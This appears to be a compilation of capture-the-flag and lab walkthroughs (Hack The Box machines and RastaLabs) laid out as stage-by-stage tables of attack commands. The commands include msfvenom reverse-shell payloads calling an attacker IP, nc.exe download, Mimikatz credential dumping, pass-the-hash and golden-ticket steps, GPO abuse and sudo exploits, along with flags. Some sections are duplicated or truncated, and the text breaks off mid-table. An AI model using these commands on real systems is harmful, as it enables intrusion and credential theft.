# Network Scenarios ### Network#1 LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts ### Network#2 Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket ### Network#3 always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service ### Network#4 Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DSync Attack ### # Network#5 | ID | Stage | Techniques | Commands | | -- | ----------- | -------------------------------------- | ---------------------------------------------------------- | | 1 | Enumeration | Online search for lab IP range | N/A | | 2 | Enumeration | Port scanning with masscan | `masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0` | | 3 | Enumeration | Detailed host scanning with nmap | `nmap` (specific commands not provided) | | 4 | Enumeration | Finding domain names with crackmapexec | `crackmapexec` (specific commands not provided) | ### Reel | ID | Stage | Techniques | Commands | | -- | --------------------- | ------------------------------ | --------------------------------------------------------------------------------------------------------------- | | 1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.210` | | 2 | Enumeration | Gobuster directory scanning | `gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50` | | 3 | Credential Harvesting | Gathering usernames | Gather usernames manually and create a `user.txt` file | | 4 | Credential Harvesting | Password spraying | `python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01` | | 5 | Phishing | Sending phishing emails | Use Outlook to send phishing emails and capture NTLMv2 hash with Responder | | 6 | Hash Cracking | Cracking NTLMv2 hash | `hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force` | | 7 | Access | PowerShell remote session | `$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson` | | 8 | Privilege Escalation | Creating a Symlink | `New-Item -ItemType Junction -Path 'C:\\ProgramData\\root' -Target 'C:\\Users\\Administrator'` | | 9 | Privilege Escalation | Using Check-File command | `Check-File C:\\programdata\\root\\Desktop\\root.txt` | | 10 | Exfiltration | Transferring files with nc.exe | `iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe'` | ### Jewel | ID | Stage | Techniques | Commands | | -- | -------------------- | ----------------------------------------- | ------------------------------------------------------------------------------- | | 1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.211` | | 2 | Web Enumeration | Checking server with Wappalyzer | Use Wappalyzer to identify backend technologies | | 3 | Web Enumeration | Analyzing .git directory | Check the Gemfile in the .git directory for Ruby and Gem versions | | 4 | Exploitation | Exploiting Ruby on Rails | Use a Ruby on Rails exploit | | 5 | Post-Exploitation | Capturing request in Burp | Capture the request and modify it with the exploit | | 6 | Post-Exploitation | Getting a reverse shell | Use netcat listener and send the exploit to get a reverse shell | | 7 | Privilege Escalation | Cracking password hashes | Use John the Ripper to crack password hashes found in `/var/backups` | | 8 | Privilege Escalation | Using .google\_authenticator file | Use the contents of `.google_authenticator` to bypass two-factor authentication | | 9 | Privilege Escalation | Synchronizing time for successful exploit | Adjust the system time to match the timezone for the exploit to work | | 10 | Privilege Escalation | Gaining root access with GTFOBins | `sudo gem open -e "/bin/sh -c /bin/sh" rdoc` to gain root access | ### Atom | ID | Stage | Techniques | Commands | | -- | ------------------- | ------------------------------------ | -------------------------------------------------------------------------------------------- | | 1 | Recon | Nmap scanning | `nmap -sV -sC -oN nmap 10.10.10.237` | | 2 | File Analysis | Analyzing executable file | `file heedv1\\ Setup\\ 1.0.0.exe` | | 3 | SMB Enumeration | Enumerating SMB shares | `smbclient -L \\\\10.10.10.237` | | 4 | SMB File Transfer | Transferring files via SMB | `smbclient \\\\\\\\10.10.10.237\\Software_Updates` then `get UAT_Testing_Procedures.pdf` | | 5 | Exploitation | Crafting malicious binary | `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"` | | 6 | YML File Creation | Creating a .yml file for the exploit | Manual creation of `latest.yml` file | | 7 | SMB File Transfer | Uploading .yml file via SMB | `smbclient \\\\\\\\10.10.10.237\\Software_Updates` then `put latest.yml` | | 8 | Reverse Shell | Obtaining a reverse shell | Use Metasploit to listen for the reverse shell | | 9 | Redis Exploitation | Exploiting Redis | `redis-cli -h 10.10.10.237` then `get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0` | | 10 | Password Decryption | Decrypting password | `python3 decrypt.py` with the script provided in the summary | ### Network1 | ID | Stage | Techniques | Commands | | -- | ---------------- | ------------------------------ | -------------------------------------------------------------------- | | 1 | Data Analysis | Reading pcap file | Use NetworkMiner to read the `.dmp` file and extract the secret file | | 2 | Cryptography | Decoding the flag | Use `filecryptopgraphy.psm1` PowerShell module | | 3 | File Preparation | Preparing files for decryption | Rename the secret file to `secret.txt.AES` on ws04 | | 4 | Key Conversion | Converting key for decryption | \`$key = Get-Content key.txt | | 5 | File Decryption | Decrypting the file | `Unprotect-File '.\\secret.txt.AES' -Algorithm AES -Key $key` | | 6 | Flag Retrieval | Retrieving the flag | The flag is `RASTA{cryp70_3xf1l7r4710n}` | ### Network2 | ID | Stage | Techniques | Commands | | -- | --------------------- | ------------------------------- | -------------------------------------------------------------------------------------------------------------------------- | | 1 | Credential Dumping | Enumerating credentials on WS02 | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force` | | 2 | Credential Dumping | Using Mimikatz to dump creds | Upload `mimikatz.exe` and execute `sekurlsa::dpapi` to get the master key | | 3 | Credential Decryption | Decrypting credentials | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...` | | 4 | Port Forwarding | Setting up port forwarding | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389` | | 5 | RDP Connection | Connecting via RDP with Remmina | Install Remmina, import `sql01.rdp`, change host, export to `.rdp` file | | 6 | RDP Connection | Using xfreerdp to connect | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local` | | 7 | Flag Retrieval | Retrieving the flag | The flag is `RASTA{c00k1n6_w17h_645_n0w}` | ### Network3 | ID | Stage | Techniques | Commands | | -- | ---------------------- | ------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Credential Enumeration | Finding LAPS group members | Enumeration to find `ngodfrey_adm` is part of LAPS group on WS05 | | 2 | Credential Access | Dumping credentials with PowerSploit | `powershell -ep bypass` then `Import-module ./PowerSploit.psd1` | | 3 | Credential Access | Using credentials for access | `$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force` then `$cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\\ngodfrey_adm', $SecPassword)` | | 4 | Credential Access | Getting AD object with credentials | `Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred` | | 5 | Local Admin Passwords | Retrieving local admin passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 | | 6 | Port Forwarding | Setting up port forwarding with Meterpreter | `portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445` and similar for other ports | | 7 | Exploitation | Using MS17-010 exploit for admin shell | `exploit/windows/smb/ms17_010_psexec` with `lport 80, 443, 8080` | | 8 | Flag Retrieval | Retrieving flags from WS02 and WS04 | Flags are `RASTA{3v3ryb0dy_l0v35_l4p5}`, `RASTA{wh3r3_w45_2f4_!?}`, `RASTA{50m371m35_y0u_mu57_b4ck7r4ck}` | | 9 | Post-Exploitation | Running Mimikatz on WS02 | `privilege::debug` then `sekurlsa::logonPasswords` | | 10 | File Permissions | Modifying file permissions for flag | `icacls flag.txt /grant administrator:F` or `icacls flag.txt /grant RLAB\\ahope:F` | ### Network4 | ID | Stage | Techniques | Commands | | | -- | -------------------- | --------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------ | | 1 | Privilege Escalation | AS-REP Roasting |

Import-module ./asreproast.ps1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash

| | 2 | Hash Extraction | Saving Hash | Copy the hash to a txt file and save it with UTF-8 encoding | | | 3 | Wordlist Creation | Using kwprocessor | `./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt` | | | 4 | Password Cracking | Using John the Ripper | Use John the Ripper (jumbo version) to crack the hash | | | 5 | Credential Use | User Enumeration | `net use H: \\\\fs01.rastalabs.local\\home$\\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"` | | | 6 | Flag Retrieval | Accessing Flag | The flag is `RASTA{k3rb3r05_15_7r1cky}` | | ### Network5 | ID | Stage | Techniques | Commands | | -- | -------------- | --------------------------------- | ----------------------------------------------------------------------------------------------------------------------------- | | 1 | Enumeration | Viewing shares on `fs01` | `net view \\fs01 /all` | | 2 | Enumeration | Using PowerSploit for enumeration |

powershell -ep bypass
Import-module ./PowerSploit.psd1
Get-NetShare \fs01

| | 3 | Flag Retrieval | Accessing open shares | Flag is `RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}` | ### Network6 | ID | Stage | Techniques | Commands | | -- | ----------------- | ----------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Phishing | Creating phishing HTA | `python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta` | | 2 | Web Server Setup | Hosting HTA on Apache2 |

copy index.html launcher.hta /var/www/html
service apache2 start

| | 3 | Listener Setup | Setting up Metasploit listener | `msfconsole -r unicorn.rc` | | 4 | Share Enumeration | Viewing shares on the network |

net share
net view
net use K: \\\hostname\share$
net view \\\hostname /all

| | 5 | User Enumeration | Displaying domain user accounts | `net user /domain` | | 6 | User Information | Viewing user info | `net user [username] /domain` | | 7 | Group Enumeration | Viewing domain group members | `net group finance /domain` | | 8 | Drive Enumeration | Listing logical drives |

fsutil fsinfo drives
wmic logicaldisk get name
diskpart > list volume

| | 9 | Network Recon | Pinging servers for IP addresses |

ping DC01
ping FS01
ping MX01
ping NIX01
ping SQL01
ping WS01
ping WS02
ping WS03
ping WS05

| | 10 | Flag Retrieval | Accessing the flag | Flag is `RASTA{w007_f007h0ld_l375_pwn}` | | 11 | KeePass Database | Found KeePass database and key file | Located in `M:\\Documents` | ### Network7 | ID | Stage | Techniques | Commands | | -- | --------------------- | -------------------------------------- | -------------------------------------------------------------------------------------------- | | 1 | User Enumeration | Finding user directory on `fs01` | `net user ahope /domain` | | 2 | Network Drive Mount | Mounting network drive to access file | `net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"` | | 3 | File Conversion | Converting .ppk to OpenSSH format | `puttygen nix01.ppk -O private-openssh -o nix` | | 4 | Network Configuration | Adding route and running proxy server | Commands for adding route and running socks4a proxy server on `ws01` not provided in summary | | 5 | SSH Connection | Connecting via SSH with proxychains | `proxychains ssh -i nix ahope@10.10.122.20` | | 6 | Privilege Escalation | Using exploit for privilege escalation | Compile exploit with `gcc exp1.c -o exploit` | | 7 | File Transfer | Transferring exploit to target | `proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope` | | 8 | File Download | Downloading file from remote to local | `proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta` | | 9 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{y0ur3_4_b4ll3r_70_637_7h15}` | ### Network8 | ID | Stage | Techniques | Commands | | -- | --------------------- | ------------------------------------ | ---------------------------------------------------------------------------------------------------- | | 1 | Port Forwarding | Forwarding port to `ws01` | `portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445` | | 2 | Remote Execution | Using Metasploit psexec for shell | Use msf psexec to get a shell on `ws01` | | 3 | Remote Execution | Using Impacket psexec for shell | Use Impacket psexec to get a shell on `ws01`, add route in meterpreter | | 4 | Proxy Configuration | Setting SOCKS4a proxy in Metasploit | Set socks4a proxy in msf, then edit `/etc/proxychains.conf` | | 5 | Enumeration | Using CrackMapExec to enumerate | `proxychains crackmapexec 10.10.120.1 -u rweston_da -H --ntds drsuapi` | | 6 | Hash Dumping | Dumping hashes | Dump hashes with CrackMapExec and proxychains | | 7 | Credential Access | Accessing vault with Mimikatz | Use Mimikatz on `ws01` to access vault credentials | | 8 | Credential Decryption | Decrypting credentials | `dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\ /masterkey:` | | 9 | Impersonation | Impersonating user with Incognito | In meterpreter, load incognito and impersonate `rweston` | | 10 | Clipboard Monitoring | Monitoring clipboard for credentials | Transfer shell to Empire and monitor clipboard | | 11 | RDP Connection | Connecting via RDP with credentials | `xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10` | | 12 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}` | ### Network9 | ID | Stage | Techniques | Commands | | -- | --------------- | ----------------------- | --------------------------------------------------------------------------------------- | | 1 | Port Forwarding | Forwarding port to ws05 | `portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445` | | 2 | Credential Use | Using rweston\_da hash | `rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa` | | 3 | Exploitation | Exploit via smb/psexec | Use the hash with smb/psexec to exploit | | 4 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{53rv1c3_4bu53_f7w}` | ### Network10 | ID | Stage | Techniques | Commands | | -- | -------------------- | ----------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Credential Use | Using `epugh_adm` credentials | Log in to `web01 (10.10.110.10)` and then RDP to `sql01 (10.10.122.15)` using `epugh_adm` creds | | 2 | Lateral Movement | RDP to `fs01` with `gopikrishna` | RDP to `fs01` with user `gopikrishna` \[local admin] | | 3 | Malware Execution | Running `p0wnedshell.exe` | Run `p0wnedshell.exe` with admin cmd | | 4 | Credential Dumping | Invoke Mimikatz from `p0wnedshell` | Use option 4 in `p0wnedshell`, invoke Mimikatz to get `rweston_da` NTLM hash | | 5 | Credential Use | Pass-the-hash with Mimikatz | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa` | | 6 | Golden Ticket Attack | Perform DCSync to get `krbtgt` hash | Use option 10 in `p0wnedshell`, perform DCSync | | 7 | Golden Ticket Attack | Generate golden ticket | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket` | | 8 | Golden Ticket Attack | Use golden ticket | `kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket` | | 9 | Flag Retrieval | Accessing the flag |

pushd \\\dc01.rastalabs.local\C$
Flag is RASTA{r4574l4b5\_ch4mp10n}

| ### Network11 | ID | Stage | Techniques | Commands | | -- | ----------------- | ------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Initial Access | Using `epugh_adm` credentials | Log in to `web01 (10.10.110.10)` | | 2 | Lateral Movement | RDP to `sql01` with `epugh_adm` creds | Take RDP of `sql01 (10.10.122.15)` using `epugh_adm` credentials | | 3 | Database Access | Start SQL Management Studio | Start SQL Management Studio and connect via Windows authentication | | 4 | Database Querying | Querying SQL database |

use umbraco;
SELECT TABLE\_NAME FROM umbraco.INFORMATION\_SCHEMA.TABLES WHERE TABLE\_TYPE = 'BASE TABLE'

| | 5 | Flag Retrieval | Retrieving the flag from database |

select \* from Flag
Flag is RASTA{d474b4535\_4r3\_u5u4lly\_1n73r3571n6}

| ### Network12 | ID | Stage | Techniques | Commands | | -- | ------------------ | --------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | 1 | Credential Use | Logging in with `epugh_adm` credentials | `mstsc /v:web01 /u:epugh_adm /p:[password]` | | 2 | Lateral Movement | RDP to `sql01` using `epugh_adm` | `mstsc /v:sql01 /u:epugh_adm /p:[password]` | | 3 | GPO Enumeration | Enumerating GPO permissions | \`Get-NetGPO | | 4 | Group Membership | Checking group members | `net user epugh_adm /domain` | | 5 | GPO Permission | Finding GPO with weak permissions | \`Get-NetGPO -ComputerName fs01.rastalabs.local | | 6 | OU Enumeration | Finding host with specific policy | \`Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}" | | 7 | Policy Enumeration | Identifying applied policy | \`Get-NetGPO -ComputerName fs01.rastalabs.local | | 8 | GPO Abuse | Creating and applying immediate tasks |

New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco\@12345 /add' -force
New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force

| | 9 | File Permissions | Modifying permissions for `flag.txt` | `icacls flag.txt /grant administrators:F` | | 10 | Flag Retrieval | Retrieving the flag | Flag is `RASTA{6p0_4bu53_15_h4rdc0r3}` | ### SneakyMailer | ID | Stage | Techniques | Commands | | -- | --------------------- | -------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Initial Recon | Nmap scan | `nmap -sC -sV 10.10.10.197` | | 2 | DNS Enumeration | Brute-force subdomains | `ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185` | | 3 | Email Gathering | Extract emails | Extract emails from `http://sneakycorp.htb/team.php` to `mails.txt` | | 4 | Phishing | Send phishing emails | Use `swaks` to send emails to addresses in `mails.txt` | | 5 | Credential Harvesting | Decode credentials | Use Burp Suite to decode credentials from intercepted traffic | | 6 | Email Client Setup | Configure email client | Set up `evolution` with SMTP server and `paulbyrd@sneakymailer.htb` credentials | | 7 | FTP Access | Access FTP | `ftp 10.10.10.197` with credentials obtained | | 8 | Reverse Shell | Upload and trigger reverse shell | Upload `rev.php` via FTP and trigger with `curl` | | 9 | Privilege Escalation | Add SSH key to authorized keys | Add generated SSH key to `/home/low/.ssh/authorized_keys` via malicious package | | 10 | Sudo Exploitation | Exploit sudo permissions | Use `sudo /usr/bin/pip3` to execute a malicious package with a reverse shell | ### Mango | ID | Stage | Techniques | Commands | | -- | -------------------- | -------------------------------- | -------------------------------------------------------------------------------------------------------------------------- | | 1 | Port Scanning | Masscan and Nmap |

masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0
nmap \[options] \[target]

| | 2 | Web Enumeration | Checking web ports | Access web service on ports 80 and 443 | | 3 | SSL Certificate | Viewing certificate | View SSL certificate details | | 4 | Host File Editing | Adding VHOST to hosts file | Edit `/etc/hosts` to add `staging-order.mango.htb` | | 5 | NoSQL Injection | Bypassing login | Use Burp Suite to intercept and modify request for NoSQL injection | | 6 | Data Extraction | Automating credential extraction | Run Python script to extract credentials for `admin` and `mango` users | | 7 | SSH Connection | Accessing SSH | SSH into the server using extracted credentials | | 8 | User Flag Access | Retrieving user flag | Use `su` to login as `admin` and retrieve user flag | | 9 | Privilege Escalation | Exploiting SUID file | Use SUID file to read root flag or exploit for root access | | 10 | Root Flag Access | Reading root flag | Run binary or use `jjs` to read root flag | ### Time | ID | Stage | Techniques | Commands | | -- | -------------------------------- | ------------------------------------------------ | ----------------------------------------------------------------------------- | | 1 | Reconnaissance | Nmap scan | `nmap -sC -sV -oA nmap/result 10.10.10.214` | | 2 | Web Vulnerability Scan | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on `http://10.10.10.214` | | 3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create `dedsec.sql` with payload and serve it with Python HTTP server | | 4 | Initial Access | Gaining a shell as user `pericles` | Input crafted JSON to trigger the exploit and gain a shell | | 5 | Privilege Escalation | Using `timer_backup.sh` for privilege escalation | Add your SSH public key to `/root/.ssh/authorized_keys` via `timer_backup.sh` | | 6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use `timer_backup.sh` to add SUID bit to `/bin/bash` and open a root shell | | 7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture `user.txt` and `root.txt` | ### Tabby | ID | Stage | Techniques | Commands | | -- | -------------------------------- | ------------------------------------------------ | ----------------------------------------------------------------------------- | | 1 | Reconnaissance | Nmap scan | `nmap -sC -sV -oA nmap/result 10.10.10.194` | | 2 | Web Enumeration | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on `http://10.10.10.214` | | 3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create `dedsec.sql` with payload and serve it with Python HTTP server | | 4 | Initial Access | Gaining a shell as user `pericles` | Input crafted JSON to trigger the exploit and gain a shell | | 5 | Privilege Escalation | Using `timer_backup.sh` for privilege escalation | Add your SSH public key to `/root/.ssh/authorized_keys` via `timer_backup.sh` | | 6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use `timer_backup.sh` to add SUID bit to `/bin/bash` and open a root shell | | 7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture `user.txt` and `root.txt` | ### Quick | ID | Stage | Techniques | Commands | | -- | -------------------- | ------------------------- | ------------------------------------------------------------------------------------------------------- | | 1 | Reconnaissance | Nmap scan | `nmap -sC -sV -oA nmap/result 10.10.10.186` | | 2 | Web Enumeration | Dirbuster scan | `dirbuster` | | 3 | QUIC Protocol Access | Accessing HTTP/3 Protocol | `cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https://quick.htb/` | ### ForwardSlash | ID | Stage | Techniques | Commands | | -- | -------------------------- | ------------------------------- | ------------------------------------------------------------------------------------- | | 1 | Reconnaissance | Nmap scan | `nmap -T4 -p- -oA forwardslash.scan forwardslash.htb` | | 2 | Subdomain Enumeration | WFUZZ fuzzing | Use WFUZZ with common wordlists to find subdomains | | 3 | Directory Enumeration | GoBuster scanning | Use GoBuster to enumerate directories | | 4 | LFI Vulnerability | Exploiting Local File Inclusion | Use Burp Suite to exploit LFI and directory traversal | | 5 | Database Credential Access | Obtaining credentials via LFI | Use LFI to read `var/www/backup.forwardslash.htb/config.php` for database credentials | | 6 | API Exploitation | Using php\://filter wrapper | Exploit API with `php://filter/convert.base64_encode/resource` to read files | | 7 | FTP Credential Access | Decoding Base64 for credentials | Decode Base64 to find FTP credentials | | 8 | SSH Access | Using FTP credentials for SSH | Use FTP credentials to access SSH | | 9 | User Flag Acquisition | Enumerating user directories | Find and read `user.txt` in user's directory | ### P.O.O | ID | Stage | Techniques | Commands | | -- | --------------------- | -------------------------- | --------------------------------------------------------------------------------------------------- | | 1 | Reconnaissance | Nmap Scanning | `nmap -p- -A -T4 poo.htb` | | 2 | Directory Enumeration | Fuzzing with WFUZZ | `wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ` | | 3 | Exploitation | Exploiting .DS\_Store File | Use `ds_store_exp` tool to extract information from the .DS\_Store file | ### P.O.O 2 | ID | Stage | Techniques | Commands | | -- | --------------------------- | ------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------- | | 1 | Initial Recon | Nmap Scanning | `nmap -p 1-16000 dyplesher.htb` | | 2 | Web Enumeration | WFUZZ Directory Discovery | `wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt` | | 3 | Git Repository Cloning | Using GitDumper | `./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher` | | 4 | Memcached Credential Access | Using memcached-cli to retrieve credentials | `memcached-cli felamos:zxcvbnm@dyplesher.htb:11211` | | 5 | Password Cracking | Using John the Ripper | Use John the Ripper with retrieved hashes | | 6 | Gogs Service Access | Logging into Gogs with cracked credentials | Log into Gogs service at port 3000 | | 7 | Git Bundle Analysis | Unpacking Git Bundles | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack | ### Dyplesher | ID | Stage | Techniques | Commands | | -- | --------------------------- | ------------------------- | -------------------------------------------------------------------------------------------------------------------------------- | | 1 | Initial Recon | Nmap Scanning | `nmap -p 1-16000 dyplesher.htb` | | 2 | Web Enumeration | WFUZZ Directory Discovery | `wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt` | | 3 | Cloning Exposed Repository | Using GitDumper | `./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher` | | 4 | Memcached Credential Access | Using memcached-cli | `memcached-cli felamos:zxcvbnm@dyplesher.htb:11211` | | 5 | Cracking Hashes | Using John the Ripper | Use John the Ripper with retrieved hashes | | 6 | Gogs Service Access | Logging into Gogs | Log into Gogs service at port 3000 | | 7 | Git Bundle Analysis | Unpacking Git Bundles | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack | ### Cascade | ID | Stage | Techniques | Commands | | -- | ------------------- | ---------------------------------- | -------------------------------------------------------------- | | 1 | Initial Recon | Nmap Scanning | `nmap -sV -p- -oA cascade.nmap cascade.htb` | | 2 | User Enumeration | Enum4Linux | `enum4linux -a cascade.htb` | | 3 | LDAP Enumeration | Impacket LDAPSearch | `impacket-ldapsearch -u 'r.thompson' -p 'rY4n5eva'` | | 4 | SMB Enumeration | Accessing SMB Shares | `smbclient //cascade.htb/IT -U r.thompson` | | 5 | Log Analysis | Reviewing Service Logs | `cat ArkAdRecycleBin.log` | | 6 | Registry Analysis | Downloading and Analyzing Registry | `get VNC Install.reg; cat VNC Install.reg` | | 7 | Password Decryption | Decrypting VNC Passwords | Use online HEX decoder or VNC password decryption tool | | 8 | Remote Access | Using Evil-WinRM | `evil-winrm -i cascade.htb -u s.smith -p 'decrypted_password'` | | 9 | Share Enumeration | Listing SMB Shares | `smbclient //cascade.htb/Audit$ -U s.smith` | | 10 | Database Analysis | Analyzing SQLite Database | Open `Audit.db` with a database viewer like EditPlus | ### Blunder | ID | Stage | Techniques | Commands | | -- | ------------------------ | ---------------------------------- | ----------------------------------------------------------- | | 1 | Initial Recon | Nmap Scanning | `nmap -sV -p- -oA blunder.nmap blunder.htb` | | 2 | Web Enumeration | Fuzzing with Extensions | `wfuzz -u http://blunder.htb/FUZZ -w list.txt -t 50 --hw 0` | | 3 | Exploit Identification | Searchsploit | `searchsploit bludit` | | 4 | Brute Force Attack | Using Custom Script | Custom Python script for brute-forcing | | 5 | Exploitation | Metasploit Framework | `msfconsole` and use exploit for Bludit CMS | | 6 | Shell Stabilization | Python TTY Spawn | `python3 -c 'import pty; pty.spawn("/bin/bash")'` | | 7 | User Privilege Discovery | Checking Sudo Permissions | `sudo -l` | | 8 | Privilege Escalation | Exploiting Sudo Bug CVE-2019-14287 | `sudo -u#-1 /bin/bash` | ### Worker | ID | Stage | Techniques | Commands | | -- | --------------------- | -------------------------------- | -------------------------------------------------------------------------------- | | 1 | Initial Recon | Nmap Scanning | `nmap -sC -sV 10.10.10.203` | | 2 | SVN Enumeration | SVN Commands | `svn help`, `svn list svn://10.10.10.203` | | 3 | Sub-Domain Discovery | Adding Sub-Domains to Hosts | Edit `/etc/hosts` and add sub-domains | | 4 | SVN Log Analysis | Viewing SVN Logs | `svn log svn://10.10.10.203/` | | 5 | SVN Diff Analysis | Viewing SVN Diffs | `svn diff -c r2 svn://10.10.10.203` | | 6 | Azure DevOps Access | Logging into Azure DevOps | Use credentials to log into `devops.worker.htb` | | 7 | Malicious File Upload | Creating and Uploading ASPX File | `msfvenom` to create `payload.aspx` and upload via pull request | | 8 | Meterpreter Shell | Getting Reverse Shell | Set up listener with `msfconsole` and navigate to `lens.worker.htb/payload.aspx` | | 9 | Post-Exploitation | Meterpreter Commands | `getuid`, `sysinfo`, `cd /users`, `dir` in meterpreter shell | ### Jerry | ID | Stage | Techniques | Commands | | -- | ---------------- | -------------------------------- | -------------------------------------------------------------------------------------------- | | 1 | Reconnaissance | Nmap Scanning | `nmap -sC -sV 10.10.10.95` | | 2 | Access Tomcat | Default Credentials | Use default credentials `tomcat:s3cret` to access Apache Tomcat Manager | | 3 | Deploy WAR | MsfVenom WAR File Creation | `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f war > reverse_shell` | | 4 | Gain Shell | Netcat Listener | `nc -lvnp 4444` then access the deployed WAR file to get a shell | | 5 | Privilege Check | Whoami Command | `whoami` to check the current user privileges | | 6 | Flag Acquisition | Directory Navigation and Reading | Navigate to `C:\Users\Administrator\Desktop\flags` and read `2 for the price of 1.txt` | ### Admirer | ID | Stage | Techniques | Commands | | -- | -------------------- | ----------------------------------------------- | ------------------------------------------------------------------------------------ | | 1 | Initial Enumeration | Nmap Scanning | `nmap -sC -sV -oN nmap/ 10.10.10.187` | | 2 | Accessing FTP | Using Found Credentials | Use `ftpuser` credentials found in `credentials.txt` | | 3 | Exploring Web Server | Checking `robots.txt` | Access `http://10.10.10.187/robots.txt` to find disallowed entries | | 4 | Downloading Files | Using FTP to Download Files | Download `html.tar.gz` and `dump.sql` from the server | | 5 | Code Analysis | Reviewing PHP Scripts | Analyze `db_admin.php` and `admin_tasks.php` for potential credentials and functions | | 6 | SSH Access | Using Credentials for SSH | Use `waldo` credentials to access SSH | | 7 | Privilege Escalation | Analyzing Sudo Permissions | Run `sudo -l` to check for allowed commands for `waldo` | | 8 | Exploiting Scripts | Using 